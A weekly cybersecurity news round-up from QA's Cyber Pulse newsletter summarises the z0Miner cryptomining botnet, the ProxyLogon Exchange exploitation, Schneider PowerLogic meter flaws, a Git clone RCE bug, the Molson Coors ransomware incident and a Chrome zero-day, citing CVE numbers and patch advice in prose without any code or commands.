Here is our cyber security news round-up of the week:
Crypto-mining botnet targets unpatched vulnerabilities in cloud servers
Attackers often keep upgrading their tools to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner cryptomining malware was spotted probing cloud servers by exploiting a new set of unpatched vulnerabilities. The botnet was using exploits targeting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE, impacting Jenkins servers.
After compromising a server, the malware will first download a malicious shell script and set up a new cron entry to periodically grab and execute malicious scripts from Pastebin. The botnet downloads a mining kit containing an XMRig miner script (java.exe), a config file (config.json), and a starter script (solr.sh). It starts to mine for Monero (XMR) cryptocurrency in the background.
According to the Tencent Security Team, z0Miner was actively exploiting two Weblogic pre-auth RCE bugs tracked as CVE-2020-14882 and CVE-2020-14883 to spread to other devices. In addition, the botnet was seen spreading laterally on the network of already compromised devices via SSH.
Continued exploitation of Microsoft Exchange Servers
A bug referred to as ProxyLogon was one of four Microsoft Exchange zero-days that Microsoft patched in an out-of-band release on 3 March 2021. It's part of the Hafnium attack, and sysadmins are advised to upgrade on-prem and hosted Exchange deployments, per Microsoft's advice, and also to run Microsoft Safety Scanner, a Microsoft malware discovery tool.
Since Microsoft disclosed ongoing attacks using ProxyLogon exploits last week, at least ten APT groups have been spotted by Slovak internet security firm ESET targeting unpatched Exchange servers. They also detected the deployment of PowerShell downloaders on multiple email servers via attack infrastructure previously linked to the DLTMiner coin-mining campaign.
A (mostly) working ProxyLogon proof-of-concept exploit was shared earlier this week (and later removed) by a security researcher. According to Palo Alto Networks's telemetry data, more than 125,000 Exchange Servers still wait to be patched worldwide. Tens of thousands of organisations have already been compromised following ongoing attacks exploiting the ProxyLogon flaws since at least January, two months before Microsoft started releasing patches. These vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.
Schneider PowerLogic smart meters vulnerable
Industrial cybersecurity firm Claroty this week disclosed technical details for two potentially serious vulnerabilities affecting PowerLogic smart meters made by Schneider Electric. PowerLogic is a line of revenue and power quality meters that are used not only by utilities, but also industrial companies, healthcare organisations and data centers for monitoring electrical networks. Researchers at Claroty discovered that some of the PowerLogic ION and PM series smart meters are affected by vulnerabilities that can be exploited remotely by an unauthenticated attacker by sending specially crafted TCP packets to the targeted device.
“These smart meters communicate using a proprietary ION protocol over TCP port 7700, and packets received by the device are parsed by a state machine function,” Claroty explained in a blog post. “We found that it is possible to trigger the flaw during the packet-parsing process by the main state machine function by sending a crafted request. This can be done without authentication because the request is fully parsed before it is handled or authentication is checked.”
Claroty said its researchers identified two different exploitation paths – depending on the architecture of the targeted device – and two different CVE identifiers have been assigned. One of them, CVE-2021-22714, is considered critical as it allows an attacker to cause the targeted meter to reboot (i.e. DoS condition) and possibly even to execute arbitrary code. The other one, CVE-2021-22713, can only be exploited to force the device to reboot and it has been assigned a high severity rating. Users of the affected Schneider Electric products should apply the patches or mitigations to prevent potential attacks, particularly since information about the flaws has been made public.
Git vulnerability could enable remote code execution attacks during clone process
The Git Project has patched a vulnerability that could result in remote code execution. The bug – tracked as CVE-2021-21300 – is present in several versions of the open source code management system, and could allow a hostile remote repository to execute code locally during a clone operation. Crucially, the vulnerability only affects users with case-insensitive filesystems that enable support for symbolic links. Files using a clean/smudge filter such as Git LFS must also be enabled for the attack to work.
A security advisory reads: “In affected versions of Git, a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS).
The release fixes the bug in versions 2.17.6 through to 2.30.2. Git users often clone an existing repository for various reasons, such as building on a fully-fledged copy from elsewhere or keeping a copy of their project in case the server disk is corrupted. Since the RCE vulnerability only affects case insensitive filesystems, not all Git users are vulnerable to exploitation. Other operating systems such as Linux – which is case sensitive by default – are presumed to be safe, however users should still heed caution.
Molson Coors Brewery crippled by cyber attack
A cyber attack took place at Molson Coors breweries based in the US, leaving the brewery unable to produce beer at this time. Molson Coors has a huge portfolio of beer brands, including the well-known Coors and Miller brands, but also Molson Canadian, Blue Moon, Peroni, Grolsch, Killian’s, and Foster’s. The representatives of Molson Coors gave just a few details, but cybersecurity experts say this type of attack is becoming all too familiar. The company acknowledges “a systems outage” caused by a “cybersecurity incident” that caused delays or disruptions to brewery operations, production and shipments.
“The Company is working around the clock to get its systems back up as quickly as possible,” Miller Coors wrote in the filing. “Although the Company is actively managing this cybersecurity incident, it has caused and may continue to cause a delay or disruption to parts of the Company’s business, including its brewery operations, production, and shipments.”
So far, the hack seems to be a ransomware attack. Cybersecurity experts are urging the companies to back up their data on actual hard drives, so when a situation of this type presents itself they won’t be victims of ransomware.
Google fixes the third actively exploited Chrome zero-day since January
Google has addressed and fixed a new actively exploited zero-day flaw in its Chrome browser that has been actively exploited in the wild, the second one within a month. The flaw, tracked as CVE-2021-21193, is a use after free vulnerability in the Blink rendering engine. Google addressed the issue with the 89.0.4389.90 version for Windows, Mac and Linux, which will be available in the coming days. The flaw was reported to Google by an anonymous researcher on 9 March, at the time of this writing the company did not reveal details about the vulnerability to avoid those other threat actors could exploit the issue in the wild.
Edited and compiled by QA's Director of Cyber, Richard Beck.
Stay in the know
Subscribe to our monthly Learning Matters newsletter and stay up to date with QA's latest news, views, offers, must-go-to events and more.
And if you want to keep up with the latest cyber news, why not subscribe to our weekly Cyber Pulse newsletter.
Richard Beck is Director of Cyber at QA. He works with customers to build effective and successful learning solutions tailored for business needs, helping to solve business problems. Richard has designed and architected numerous enterprise and nationwide cyber programmes for QA customers. Responsible for the QA cyber portfolio, products, proposition and cyber partner community. He has over 15 years' experience in senior Information Security roles.
Prior to QA, Richard was Head of Information Security for an organisation who underpin 20% of the UK's Critical National Infrastructure. Richard also held Security and Technical Management posts in Defence, Financial Services and HMG. He holds a number of leading cyber professional certifications, including CISSP, CISM, CISA.
Richard sits on a number of industry boards and security advisory panels, and previously chaired the Communication Industry Personnel Security Information Exchange (CPNI). He is the work stream lead for Cyber Skills & Diversity on the techUK Cyber Management Committee, in addition Richard is also supporting a work stream for the UK Cyber Security Council Formation project. Richard is a regular contributor for cyber insights and industry collaboration including speaker engagements.
He is also a STEM Ambassador working to engage and enthuse young people in the area of cyber security. Providing a unique perspective on the world of cyber security to teachers and encourage young people to consider a career in cyber security.
More articles by Richard
Cyber Pulse: Edition 149 | 9 April
Stop your search for cyber security talent
Cyber Pulse: Edition 148 | 1 April
Cyber Pulse: Edition 146 | 4 March 2021
Cyber Pulse: Edition 145 | 19 February 2021
Cyber Pulse: Edition 144 | 5 February 2021
Cyber Pulse: Edition 143 | 27 January 2021
Cyber Pulse: Edition 142 | 18 January 2021
CISOs should prioritise the “human firewall” during Covid-19
Cyber Pulse: Edition 141 | 11 January 2021